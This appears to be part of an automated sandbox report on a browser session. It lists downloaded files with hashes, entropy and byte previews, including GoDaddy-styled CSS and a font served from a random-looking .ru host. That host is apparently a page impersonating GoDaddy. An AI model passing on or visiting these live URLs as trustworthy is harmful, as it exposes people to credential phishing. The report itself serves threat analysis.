                                                                  Size (bytes):1864
                                                                  Entropy (8bit):5.222032823730197
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/klYU2PKXiTJDrNtGHGVk9e7Tkij8GMA4mghRT2jIQVkqXsQEH35qpnwx219
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 450x450, components 3
                                                                  Category:downloaded
                                                                  Size (bytes):40912
                                                                  Entropy (8bit):7.9782199999966945
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:E376ECD76BB84EDE5D4C408493551735
                                                                  SHA1:8F2FA75310654233890BEFAC6C8931AD3D0A8A62
                                                                  SHA-256:7A788996635442890E688EE492B3AFCD21F5C1AEA54D304DEAD338B2B61DE406
                                                                  SHA-512:99A8E4D690482647DEBA02B10DC49DBFA1994E04CDB3A698B4FB6C4299FEFE92B255E5AD6A020498E7484FDD006C0131123B88C486CBE43D0E2E7624C57151E9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil
                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....J.Q.{+F...~q......Y..jr_...Y.&....<d....x..z...r.....c..I..?..4{.......$..u...X>G..........f..0...).G...7....I....k."..,.s.^..Zx...!.[.y.!...p..3.....{{M....!.....Y....{9.y...Ck...I....:.....-..#a.a..>.......\]..q-...`.=?..6..S.u..._^.0....H...._..YO.;..#.F...@..z.*.;.K.........%...HJ......zz...SjV..k'.E.+<nIIP.9.1XMpw}..x.../.XizH......t.<..8.v.9...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):15340
                                                                  Entropy (8bit):7.983406336508752
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                                  SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                                  SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                                  SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                                                  Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):35786
                                                                  Entropy (8bit):5.058073854893359
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                  SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                  SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                  SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/xyu8eLPpqmTcd30
                                                                  Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):15344
                                                                  Entropy (8bit):7.984625225844861
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                  Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                  Category:downloaded
                                                                  Size (bytes):28584
                                                                  Entropy (8bit):7.992563951996154
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                  SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                  SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                  SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-regular.woff2
                                                                  Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                  No static file info